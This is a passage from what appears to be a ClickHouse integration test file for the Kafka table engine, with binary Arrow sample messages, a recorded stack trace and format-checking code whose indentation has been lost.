\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00
\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
# ],
# },
# 'ArrowStream' : {
# # Not working at all:
# # Error while opening a table: Invalid: Tried reading schema message, was null or length 0, Stack trace (when copying this message, always include the lines below):
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:88: DB::ArrowBlockInputFormat::prepareReader() @ 0x1ddff1c3 in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:26: DB::ArrowBlockInputFormat::ArrowBlockInputFormat(DB::ReadBuffer&, DB::Block const&, bool) @ 0x1ddfef63 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2214: std::__1::__compressed_pair_elem<DB::ArrowBlockInputFormat, 1, false>::__compressed_pair_elem<DB::ReadBuffer&, DB::Block const&, bool&&, 0ul, 1ul, 2ul>(std::__1::piecewise_construct_t, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>, std::__1::__tuple_indices<0ul, 1ul, 2ul>) @ 0x1de0470f in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:2299: std::__1::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ArrowBlockInputFormat>::__compressed_pair<std::__1::allocator<DB::ArrowBlockInputFormat>&, DB::ReadBuffer&, DB::Block const&, bool&&>(std::__1::piecewise_construct_t, std::__1::tuple<std::__1::allocator<DB::ArrowBlockInputFormat>&>, std::__1::tuple<DB::ReadBuffer&, DB::Block const&, bool&&>) @ 0x1de04375 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:3569: std::__1::__shared_ptr_emplace<DB::ArrowBlockInputFormat, std::__1::allocator<DB::ArrowBlockInputFormat> >::__shared_ptr_emplace<DB::ReadBuffer&, DB::Block const&, bool>(std::__1::allocator<DB::ArrowBlockInputFormat>, DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03f97 in /usr/bin/clickhouse
# # /contrib/libcxx/include/memory:4400: std::__1::enable_if<!(is_array<DB::ArrowBlockInputFormat>::value), std::__1::shared_ptr<DB::ArrowBlockInputFormat> >::type std::__1::make_shared<DB::ArrowBlockInputFormat, DB::ReadBuffer&, DB::Block const&, bool>(DB::ReadBuffer&, DB::Block const&, bool&&) @ 0x1de03d4c in /usr/bin/clickhouse
# # /src/Processors/Formats/Impl/ArrowBlockInputFormat.cpp:117: DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1de0273f in /usr/bin/clickhouse
# # /contrib/libcxx/include/type_traits:3519: decltype(std::__1::forward<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&>(fp)(std::__1::forward<DB::ReadBuffer&>(fp0), std::__1::forward<DB::Block const&>(fp0), std::__1::forward<DB::RowInputFormatParams const&>(fp0), std::__1::forward<DB::FormatSettings const&>(fp0))) std::__1::__invoke<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de026da in /usr/bin/clickhouse
# # /contrib/libcxx/include/__functional_base:317: std::__1::shared_ptr<DB::IInputFormat> std::__1::__invoke_void_return_wrapper<std::__1::shared_ptr<DB::IInputFormat> >::__call<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&>(DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1&, DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de025ed in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1540: std::__1::__function::__alloc_func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0254a in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1714: std::__1::__function::__func<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1, std::__1::allocator<DB::registerInputFormatProcessorArrow(DB::FormatFactory&)::$_1>, std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) @ 0x1de0165c in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:1867: std::__1::__function::__value_func<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd14dbd in /usr/bin/clickhouse
# # /contrib/libcxx/include/functional:2473: std::__1::function<std::__1::shared_ptr<DB::IInputFormat> (DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&)>::operator()(DB::ReadBuffer&, DB::Block const&, DB::RowInputFormatParams const&, DB::FormatSettings const&) const @ 0x1dd07035 in /usr/bin/clickhouse
# # /src/Formats/FormatFactory.cpp:258: DB::FormatFactory::getInputFormat(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&, DB::ReadBuffer&, DB::Block const&, DB::Context const&, unsigned long, std::__1::function<void ()>) const @ 0x1dd04007 in /usr/bin/clickhouse
# # /src/Storages/Kafka/KafkaBlockInputStream.cpp:76: DB::KafkaBlockInputStream::readImpl() @ 0x1d8f6559 in /usr/bin/clickhouse
# # /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# # /src/DataStreams/copyData.cpp:26: void DB::copyDataImpl<DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)>(DB::IBlockInputStream&, DB::IBlockOutputStream&, DB::copyData(DB::IBlockInputStream&, DB::IBlockOutputStream&, std::__1::atomic<bool>*)::$_0&, void (&)(DB::Block const&)) @ 0x1c9ea01c in /usr/bin/clickhouse
# 'data_sample' : [
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00
\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# '\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
# ],
# },
}
for format_name, format_opts in all_formats.items():
print('Set up {}'.format(format_name))
topic_name='format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name, extra_settings=format_opts.get('extra_settings') or ''))
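# Give the Kafka engine tables time to consume the produced messages and the
# materialized views time to flush (kafka_flush_interval_ms is set to 1000 above).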
time.sleep(12)
for format_name, format_opts in all_formats.items():
print('Checking {}'.format(format_name))
topic_name='format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1,2,3] if format_opts.get('supports_empty_value', False) else [0,1,2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0 = offsets[0], offset_1 = offsets[1], offset_2 = offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since receiving messages from Kafka is asynchronous and flaky,
# we may need to check the results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
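# Illustrative sketch (not part of the original test suite and not used by the
# tests below): the poll-until-match loops repeated in several tests could be
# factored into a helper like this one; the helper name and the timeout value
# are assumptions.
def kafka_poll_until_reference(table='test.kafka', timeout=180, ref_file='test_kafka_json.reference'):
    deadline = time.time() + timeout
    result = ''
    while time.time() < deadline:
        # accumulate whatever the Kafka engine table returns on each poll
        result += instance.query('SELECT * FROM {}'.format(table), ignore_error=True)
        if kafka_check_result(result, ref_file=ref_file):
            return result
        time.sleep(0.5)
    # final strict check so a timeout fails with an assertion on the partial result
    kafka_check_result(result, True, ref_file=ref_file)
    return result
    # usage (hypothetical): result = kafka_poll_until_reference('test.kafka')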
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(name):
client = BrokerConnection('localhost', 9092, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
